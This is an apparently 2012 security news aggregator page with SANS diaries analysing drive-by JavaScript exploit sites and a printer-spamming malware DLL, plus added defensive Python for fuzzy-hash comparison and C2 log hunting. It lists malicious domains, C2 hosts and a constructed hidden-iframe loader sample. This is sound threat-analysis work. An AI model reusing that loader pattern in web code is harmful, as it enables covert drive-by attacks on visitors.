Hackin9

InfoSec News

Google's CEO Larry Page has lost his voice and will not be speaking at the company's upcoming public events, a spokeswoman for the company said on Thursday.
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
 
A hacktivist group known as UGNazi claims responsibility for multiple Twitter outages today, though Twitter has denied any attacks on its service.

 
Twitter was forced to roll back its software to a previous stable version on Thursday in order to restore service after a two-hour outage, one of its engineers said in a blog post.
 
A California court will limit the number of exhibits Apple and Samsung are able to submit when their multifaceted patent infringement case comes before a jury next month.
 
Moonlight Prior to 2.4.1/3.99.3 Multiple Security Vulnerabilities
 
Mono ASP.NET 'mod_mono' Source Code Information Disclosure Vulnerability
 


 
 
Iran's intelligence minister has accused the U.S., the U.K. and Israel of planning a "massive cyberattack" against his country after talks this week over Iran's nuclear program failed to reach an agreement, Iranian state TV reported on Thursday.
 
Microsoft is dumping its Office Starter edition as Windows 8 and the next edition of the suite, dubbed Office 2013, near completion and release later this year and early next.
 
Globus Toolkit GridFTP 'getpwnam_r()' Security Bypass Vulnerability
 
I thought I'd subtitle this diary more humorously as The Twelve Ways of Pwnmas in celebration of June-uary here in the Seattle area, where it really does rain all the time.
I am privileged to be party to a wide variety of data and telemetry for malfeasance and evil. One source in particular in use at Microsoft is a list of drive-by attack URLs discovered via detection technology utilized by MSRC Engineering.

From this feed I selected twelve (with me here on the theme?) unique URLs detected as drive-by exploit delivery vehicles bountiful in malicious JavaScript. Unfortunately the tool's reporting is currently limited to a basic yes or no on a URL's maliciousness, so I wanted to dig in, learn more about the attributes of these attacks, and share them with you here. To do so I used a specifically configured VM and copied the appropriate obfuscated content between script tags; I'm glad to share the setup details by request, and samples as well.
Such a story is better told with pictures, in keeping with the depth of my analysis skills, but first some notes of interest:

While the likes of the JS/Mult family indicate malicious JavaScript written to exploit multiple vulnerabilities (Adobe, Java, etc.), almost all of these exploits favor Internet Explorer vulnerabilities such as CVE-2010-0249, CVE-2010-0806, and CVE-2009-0075. CVE-2010-0249, aka the HTML Object Memory Corruption Vulnerability (addressed in MS10-002), was used during Operation Aurora. If you followed Aurora closely back in the day, you'll likely find the country of origin statistics below no surprise. CVE-2010-0806 was addressed in MS10-018 and CVE-2009-0075 in MS09-002, both correcting Internet Explorer issues described as uninitialized memory corruption vulnerabilities. For vulnerabilities whose updates were issued as long as three years ago, clearly enough unpatched systems remain to warrant such common exploitation.
Six of twelve samples exhibit signs of exact code reuse (Exploit:JS/AdoStream), and a seventh is a very slight variant (Exploit:JS/Mult.EA). Additional reference reading for the samples detected: Exploit:JS/AdoStream

The details on the domains of nefariousness are as follows:

Domain                        Detection name (VT analysis link)   VT detections (of 42)
www.kasuidojo.com.ar          Exploit:JS/AdoStream                32
www.ascororadea.ro            Exploit:JS/AdoStream                32
www.suportemetrocard.com.br   Exploit:JS/AdoStream                31
pacoaraujodesign.com.br       Exploit:JS/AdoStream                30
www.czgtgj.com                Exploit:JS/CVE-2010-0806.B          30
www.stubllanet.com            Exploit:JS/AdoStream                30
elnido.realtyworldphils.com   Exploit:JS/AdoStream                29
mj.zhuhai.gd.cn               Exploit:JS/CVE-2010-0806.gen!A      27
www.meydanoptik.com           Exploit:JS/Mult.EA                  26
voteforomega.info             Exploit:JS/Cripac.A                 13
space.argstorm.com            Exploit:JS/Mult.CR                  9
fedeteniselsalvador.com       Mal/JSBO-Gen                        5

Because infographics are all the rage: [infographic: country of origin for the twelve domains]

These samples also presented a great opportunity to use an ISC Handler favorite. When you suspect code reuse or matching, Jesse Kornblum's ssdeep is an ideal tool with which to validate your assumption. As stated above, the malicious JS from six of the twelve URLs was identical. Comparing the sample (Exploit:JS/AdoStream) from Germany against the sample from Brazil proved to be a 97% match.

The Exploit:JS/Mult.EA sample was also noted as a slight variant of Exploit:JS/AdoStream. Using the German sample to compare against the slight variant from Turkey showed a 94% match.

I found it interesting that the very slight difference in JS resulted in four fewer detections by AV vendors (26 versus 30). Here's the VT detection for the www.meydanoptik.com sample (Exploit:JS/Mult.EA) versus the VT detection for the www.stubllanet.com sample (Exploit:JS/AdoStream).
The diff between the two files, as seen below, shows only that the www.meydanoptik.com sample sets a cookie while the www.stubllanet.com sample does not.
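The ssdeep workflow above, as an added example that is not part of the diary and does not call ssdeep itself: a simplified context-triggered piecewise hash in Python (rolling-hash chunk boundaries, one base64 character per chunk, a block size that doubles until the signature fits in 64 characters, and an edit-distance score on the 0 to 100 scale ssdeep uses), plus the unified diff step. The two JavaScript strings are constructed, benign stand-ins for the www.stubllanet.com and www.meydanoptik.com files, differing only by a cookie-setting line, and the file labels in the diff are mine; the scores it prints are illustrative and will not equal the 97% and 94% ssdeep reported on the real samples.

```python
"""Simplified context-triggered piecewise hashing, the idea behind ssdeep.
Added example, not the diary's code and not ssdeep itself; SAMPLE_A/B and
UNRELATED are constructed, benign stand-ins for the files the diary compared."""
import difflib
import hashlib

B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
WINDOW = 7        # rolling-hash window, as in ssdeep
MAX_SIG_LEN = 64  # block size doubles until the signature fits in this
MIN_COMMON = 7    # ssdeep scores 0 unless the signatures share a 7-char run

# Constructed loader in the style of the samples discussed (the char codes
# decode to http://example.net/load.php); stands in for www.stubllanet.com.
_A_LINES = [
    'function d(){var a=[104,116,116,112,58,47,47,101,120,97,109,112,108,101,'
    '46,110,101,116,47,108,111,97,100,46,112,104,112];',
    'var s="";for(var i=0;i<a.length;i++){s+=String.fromCharCode(a[i]);}',
    'var f=document.createElement("iframe");f.setAttribute("src",s);',
    'f.style.width="1px";f.style.height="1px";f.style.visibility="hidden";',
    'document.body.appendChild(f);}',
    'if(navigator.userAgent.indexOf("MSIE")!=-1){window.onload=d;}',
]
SAMPLE_A = "\n".join(_A_LINES) + "\n"
# Same loader plus one cookie-setting statement, mirroring the diary's diff;
# stands in for www.meydanoptik.com.
SAMPLE_B = "\n".join(_A_LINES[:2] + ['document.cookie="v=1; path=/";']
                     + _A_LINES[2:]) + "\n"
# An unrelated script, to show the score collapses when there is no reuse.
UNRELATED = ('(function(){var q=document.getElementsByTagName("script");\n'
             'for(var k=0;k<q.length;k++){if(q[k].src.indexOf("stats")>=0)'
             '{return;}}\nvar img=new Image();img.src="/pixel.gif?r="'
             '+Math.random();\nwindow.__tracked=true;})();\n')


def _chunks(data, block_size):
    """Content-defined chunks: a chunk ends wherever the rolling hash of the
    last WINDOW bytes hits the trigger, so an edit only disturbs the chunks
    it touches instead of shifting every later boundary."""
    mod, drop = 1 << 32, pow(31, WINDOW, 1 << 32)
    h, start = 0, 0
    for i, b in enumerate(data):
        h = (h * 31 + b) % mod
        if i >= WINDOW:                       # retire the byte leaving the window
            h = (h - data[i - WINDOW] * drop) % mod
        if h % block_size == block_size - 1:
            yield data[start:i + 1]
            start = i + 1
    if start < len(data):
        yield data[start:]


def _signature(data, block_size):
    # one base64 character per chunk, derived from a hash of that chunk
    return "".join(B64[hashlib.sha1(c).digest()[0] & 63]
                   for c in _chunks(data, block_size))


def fuzzy_hash(data):
    """(block_size, sig, sig_at_double_size), like ssdeep's bs:sig1:sig2."""
    block_size = 3
    while len(_signature(data, block_size)) > MAX_SIG_LEN:
        block_size *= 2
    return block_size, _signature(data, block_size), _signature(data, 2 * block_size)


def _edit_distance(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _score(a, b):
    """0..100 as ssdeep scales it: edit distance over the combined length,
    and 0 outright when the signatures share no 7-character run."""
    if not any(a[i:i + MIN_COMMON] in b for i in range(len(a) - MIN_COMMON + 1)):
        return 0
    return max(0, 100 - 100 * _edit_distance(a, b) // (len(a) + len(b)))


def compare(x, y):
    """Signatures compare only at equal block size; when the two inputs chose
    sizes 2x apart, use the doubled signature of the smaller one."""
    bx, sx1, sx2 = fuzzy_hash(x)
    by, sy1, sy2 = fuzzy_hash(y)
    if bx == by:
        return max(_score(sx1, sy1), _score(sx2, sy2))
    if bx * 2 == by:
        return _score(sx2, sy1)
    if by * 2 == bx:
        return _score(sx1, sy2)
    return 0


def diff_changes(x, y):
    """Only the added/removed lines of a unified diff (file labels are mine)."""
    diff = difflib.unified_diff(x.splitlines(), y.splitlines(),
                                "stubllanet.js", "meydanoptik.js", lineterm="", n=0)
    return [l for l in diff if l.startswith(("+", "-"))
            and not l.startswith(("+++", "---"))]


if __name__ == "__main__":
    a, b, u = SAMPLE_A.encode(), SAMPLE_B.encode(), UNRELATED.encode()
    print("A vs B:", compare(a, b), " A vs unrelated:", compare(a, u))
    print("\n".join(diff_changes(SAMPLE_A, SAMPLE_B)))
```

The point of the content-defined boundaries is the one the diary relies on: inserting a line near the top of a file shifts every byte after it, which defeats a fixed-offset hash, but only the chunks overlapping the insertion change here, so the two signatures still share long runs and score high while the unrelated script scores zero. The real ssdeep uses a different rolling hash and an FNV chunk hash, so compare its output with the tool itself before drawing conclusions from a score.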

You get the idea. There are clearly commonalities in vulnerabilities targeted, methods used for exploitation, and even country of origin.
Hopefully you've found this relevant and interesting. Please share any related insight or experience you may have via comments.
Cheers.

Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Smartphones running Microsoft's upcoming Windows Phone 8 OS will use Qualcomm's Snapdragon S4 processor, the chip maker said.
 
Twitter's microblogging site went down this afternoon, got back up, crashed again and came back up again. The company said it's dealing with an ongoing problem.
 
A U.S. Federal Communications Commission proposal to address the price of dedicated telecom and broadband lines for businesses would stop large telecom carriers from seeking new price flexibility but would not scrap the underlying rules that allow price deregulation, said members of a coalition calling for changes in the rules.
 
Oracle customers hoping that the pending departure of a top company executive will help pave the way for a kinder, gentler sales culture may be engaged in wishful thinking, according to industry observers.
 
CORE-2012-0530 - Lattice Diamond Programmer Buffer Overflow
 
Web app firewalls can't erase the need for secure application development, but Gartner says WAF patching may have a growing role in the enterprise.

 
Young, tech-savvy people pay substantially less attention to online security risks and are therefore more likely to experience security problems than older people.
 
After Microsoft announced this week that it will sell a pair of branded Surface tablets, an analyst suggested that the company is also working with a contract manufacturer to build a Windows Phone 8-based smartphone.
 
Microsoft's new Surface tablets may not match Apple's iPad on battery life, according to estimates made by Computerworld based on comparable devices.
 
It's easy enough to navigate your Mac without any add-ons. You can maneuver around through folders to find what you're after, and use the Spotlight menu to search for files and launch apps more quickly. Power users tend to prefer third-party utilities like LaunchBar (Macworld rated 5 out of 5 mice) or Alfred (Macworld rated 4.5 out of 5 mice). These are keyboard-driven apps that make quick work of common actions for tech savvy users.
 
IBM DB2 Multiple Security Vulnerabilities
 
MyBB 'announcements.php' SQL Injection Vulnerability
 
Networking equipment vendor Cisco Systems released multiple security updates on Wednesday to address vulnerabilities in its AnyConnect Secure Mobility Client, ASA 5500 Series Adaptive Security Appliances, Cisco Catalyst 6500 Series ASA Services Module and Cisco Application Control Engine software.
 
Biogas fuel cells will power an extension to eBay's data center in Utah, set to go online around the middle of next year.
 
Windows Phone 8 won't run on existing Windows Phones, which will hurt sales of existing Windows Phone models in the coming months, creating acute problems for the ailing Nokia.
 
Microsoft hopes that full support for C and C++ and the ability to write apps for all Windows devices at the same time will attract more developers to Windows Phone 8.
 
Google has cooperated with universities and linguistic organizations to begin documenting approximately 3,500 languages that are at risk of disappearing in the next 100 years, the company said on Thursday.
 
IBM InfoSphere Guardium Local Denial of Service Vulnerability
 
[ MDVSA-2012:099 ] net-snmp
 
MyBB 1.6.8 'announcements.php' SQL Injection Vulnerability
 
Facial recognition start-up Face.com patched a vulnerability in its KLINK iOS app that could have allowed attackers to hijack the Facebook and Twitter accounts of its users, according to Ashkan Soltani, the independent security researcher who claims to have found the flaw.
 
[SECURITY] [DSA 2497-1] quagga security update
 
[ MDVSA-2012:098 ] libxml2
 
IT spending in Europe will virtually grind to a halt this year and next due to economic uncertainty over the euro currency, according to a Forrester Research report released Thursday.
 
With the release of Red Hat Enterprise Linux (RHEL) 6.3, Red Hat has tweaked the enterprise grade Linux distribution to add new capabilities in storage, virtualization, security, scalability and performance.
 
Business IT is evolving behind your back. Here's how to head off extinction and assert a larger role
 

As the opening day of the 2012 Olympic Games nears, IT teams in the U.K. are busy expanding their companies’ security policies and reviewing their security contingency plans. They are preparing for 17 days of Games, which will surely produce crowded transportation systems, overloaded Internet connections, and employees whose attention may be diverted by swimming relays and equestrian events.

The Olympics provide a good opportunity for companies in the U.S. and around the world to review their security policies and plans, too. Security pros can watch how their peers in the U.K. handle the pressures and disruptions caused by the Olympics, and consider how they would handle such an event if it occurred in their city.

Security contingency plans, which are similar to disaster recovery plans or business continuity plans, lay out the steps IT should take as soon as a disruptive event occurs. The idea is to make important decisions in advance, and have the necessary resources already in place, so the team can react quickly to maintain the security of their company’s data and other IT assets. Yet, according to our application security expert Michael Cobb, many companies’ security contingency plans are either unrealistic or woefully out-of-date.

Could your company continue operating securely in a chaotic environment — whether that chaos is caused by a scheduled event, such as the Olympics, or by an unplanned natural event? The 2012 Olympics serve as a reminder for all firms to review and revise their security contingency plans in light of current concerns and resources.

The relatively quiet summer months may be a good time to set up components of your security contingency plan. One of the most important components to handle in advance is widespread telecommuting. During a major event, more employees may have to work from home. You can prepare now by having all employees sign a remote working policy agreement, test the security of the Internet connection in their home, and receive training on topics, such as securely filing sensitive documents from their home office.

The Olympics also provide a hook for continued security awareness training. The IT department could send out an email educating users about Olympic ticket scams, providing a helpful lesson for any too-good-to-be-true email offer. Or the IT department could run a summertime security contest, posting a short information security quiz on the company’s Intranet and awarding gold, silver and bronze medals to the employees or departments who score highest on the quiz.

Even if the Olympics are not held in the U.S. until at least 2024, there is bound to be a significant event that will affect your company’s security posture in the near future. Prepare and practice now so your security team can execute flawlessly and take home the gold.



 
A revision to Japan's copyright law to impose criminal penalties on those who illegally download music and movies has sparked debate in the country.
 
The European Parliament's trade committee, INTA, on Thursday decided not to postpone the crucial vote on the controversial anti-piracy agreement, ACTA.
 
IBM AIX Temporary File Creation Vulnerability
 
Self-driving electric taxis, smart appliances and municipal solar power are all amenities enjoyed by the residents of the futuristic Masdar City in the Middle East. Here's how they'll make their way to the U.S.
 
A new group to promote the use of iPhones and iPads in Japanese businesses launched in Tokyo on Thursday.
 
Downloads from China on Apple's App Store have tripled from a year ago, but developers in the country must continue to look overseas to generate revenues, because of the prevalence of free apps, according to an app market analytics firm.
 
A pair of Web metrics firms have traded sharp blows, calling into question how their rival measures browser usage, and whether Microsoft's Internet Explorer or Google's Chrome is the planet's most popular.
 
You might not hear much about SOA anymore, but its imperative to make 'everything a service' is more relevant than ever
 
Drobo today announced two new storage arrays, including its first portable unit, the Drobo Mini, and a larger array with as much as six times the performance of its predecessors. The company also announced its support for Thunderbolt and USB 3.0.
 
Cisco AnyConnect Secure Mobility Client VPN Downloader Arbitrary Code Execution Vulnerabilities
 
Apple iTunes '.m3u' File Remote Stack Buffer Overflow Vulnerability
 
A week ago we mentioned a print bomb malware specimen doing the rounds, with a gradually improving AV detection ratio. However, we are receiving reports (thanks Conor!) of variants of what looks like the same malware with a much lower AV detection ratio (0/37), so do not relax your defenses.
VirusTotal: https://www.virustotal.com/file/90910a49226f6488de42d27ac1b347c68a0d5a9c1b070bf5dfdaea8ac368cfc9/analysis/1340227448/.
This new sample, xpsp4ress.dll, is stored in C:\Windows\System32 and creates a Windows scheduled task with what seems to be a random name (e.g. UUSCPK) that runs C:\WINDOWS\system32\rundll32.exe 'C:\WINDOWS\system32\xpsp4ress.dll'. It then appears to propagate by looking for shared folders and/or printers (sometimes the DLL or EXE ends up in the spool queue and, as a result, reproduces the observed garbage printing behavior).
Some of the command-and-control (C2) domains identified when the malware phones home are:

hxxp://somethingclosely.com
hxxp://ads.alpha00001.com
hxxp://storage1.static.itmages.ru
hxxp://storage5.static.itmages.ru

Look for them in your logs. There is a related write-up available from Symantec: http://www.symantec.com/business/support/index?page=content&id=TECH190982.
The beauty of this unexpected malware behavior is that it can easily be detected across the organization's printers and print servers, although at the expense of wasting precious paper, and trees as a consequence. Let's save the planet! ... and don't forget this is a good opportunity to evaluate the security of your printing architecture (network isolation, access controls, printer management, etc).
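Two hunts for the indicators above, as an added example that is not part of the diary: a pass over proxy log lines for the listed C2 hosts (exact host or a subdomain of one, so a shared image host such as itmages.ru itself is not flagged), and a pass over a schtasks export for tasks that launch rundll32 with a DLL argument, with the known xpsp4ress.dll name as the strong signal and a short all-caps task name at the root of the task library as a weaker one. The log lines, client addresses, URL paths and the schtasks CSV rows are constructed; the Squid-native log layout is an assumption about the environment, and a real `schtasks /query /fo csv /v` export carries many more columns than the four used here.

```python
"""Hunt for the print-bomb indicators in proxy logs and scheduled tasks.
Added example, not part of the diary; every log line and task row below is
constructed, only the C2 hosts and the DLL name come from the diary."""
import csv
import io
import re
from urllib.parse import urlsplit

C2_HOSTS = {
    "somethingclosely.com",
    "ads.alpha00001.com",
    "storage1.static.itmages.ru",
    "storage5.static.itmages.ru",
}
DROPPED_DLL = "xpsp4ress.dll"

# Constructed Squid-native access log: ts elapsed client code/status bytes
# method URL user hierarchy/peer type. The last line is the image host's
# front page, which is not an indicator on its own.
PROXY_LOG = """\
1340227448.101    312 10.0.0.15 TCP_MISS/200 2214 GET http://ads.alpha00001.com/in.php?id=7 - DIRECT/203.0.113.9 text/html
1340227449.204     88 10.0.0.15 TCP_MISS/200 51233 GET http://storage5.static.itmages.ru/img/1.png - DIRECT/203.0.113.10 image/png
1340227450.337     40 10.0.0.22 TCP_HIT/200 1024 GET http://www.example.com/index.html - NONE/- text/html
1340227451.519    210 10.0.0.15 TCP_TUNNEL/200 0 CONNECT somethingclosely.com:443 - DIRECT/203.0.113.11 -
1340227452.002     35 10.0.0.22 TCP_MISS/200 780 GET http://itmages.ru/ - DIRECT/203.0.113.12 text/html
"""

# Constructed excerpt of `schtasks /query /fo csv /v` (real exports have many
# more columns); "TaskName" and "Task To Run" are the ones used here.
TASK_CSV = (
    '"HostName","TaskName","Task To Run","Run As User"\n'
    '"WS-042","\\UUSCPK","C:\\WINDOWS\\system32\\rundll32.exe '
    '""C:\\WINDOWS\\system32\\xpsp4ress.dll""","SYSTEM"\n'
    '"WS-042","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",'
    '"%windir%\\system32\\defrag.exe -c","SYSTEM"\n'
    '"WS-042","\\Vendor\\Updater","C:\\WINDOWS\\system32\\rundll32.exe '
    '""C:\\Program Files\\Vendor\\upd.dll"",Run","SYSTEM"\n'
)

_DLL_RE = re.compile(r'"([^"]+\.dll)"|(\S+\.dll)', re.I)


def _host_of(url):
    if "://" not in url:                 # CONNECT lines log host:port only
        return url.rsplit(":", 1)[0].lower()
    return (urlsplit(url).hostname or "").lower()


def is_c2_host(host):
    """Exact match or subdomain of a listed host; the registered domain alone
    is deliberately not enough, since itmages.ru is a shared image host."""
    return any(host == h or host.endswith("." + h) for h in C2_HOSTS)


def c2_hits(log_text):
    """(client, host, url) for every request to a listed C2 host."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        client, url = fields[2], fields[6]
        host = _host_of(url)
        if is_c2_host(host):
            hits.append((client, host, url))
    return hits


def suspicious_tasks(csv_text):
    """Tasks whose action is rundll32 loading a DLL. The dropped DLL name is
    the strong signal; a bare all-caps name at the library root is a weak
    one; anything else is left for triage rather than dropped."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        cmd = row.get("Task To Run", "")
        if "rundll32" not in cmd.lower():
            continue
        m = _DLL_RE.search(cmd)
        dll = (m.group(1) or m.group(2)) if m else ""
        name = row.get("TaskName", "")
        reasons = []
        if dll.lower().endswith(DROPPED_DLL):
            reasons.append("known dropped DLL " + DROPPED_DLL)
        if re.fullmatch(r"\\?[A-Z]{5,8}", name):
            reasons.append("random-looking task name")
        if not reasons:
            reasons.append("rundll32 task loading a DLL (triage)")
        hits.append({"task": name, "dll": dll, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for client, host, url in c2_hits(PROXY_LOG):
        print(f"C2 contact from {client}: {host}  ({url})")
    for t in suspicious_tasks(TASK_CSV):
        print(f"task {t['task']!r} -> {t['dll']}: {', '.join(t['reasons'])}")
```

The two passes pivot on each other: the clients that reached the C2 hosts are the machines whose task list deserves the schtasks export, and the weaker "rundll32 with a DLL" match catches a renamed variant that the exact DLL name would miss, at the cost of some legitimate vendor tasks to triage by hand.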
----

Raul Siles

Founder and Senior Security Analyst with Taddong

www.taddong.com (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Yahoo and Facebook are in negotiations to resolve a patents dispute, an attorney for Yahoo told a federal court on Tuesday.
 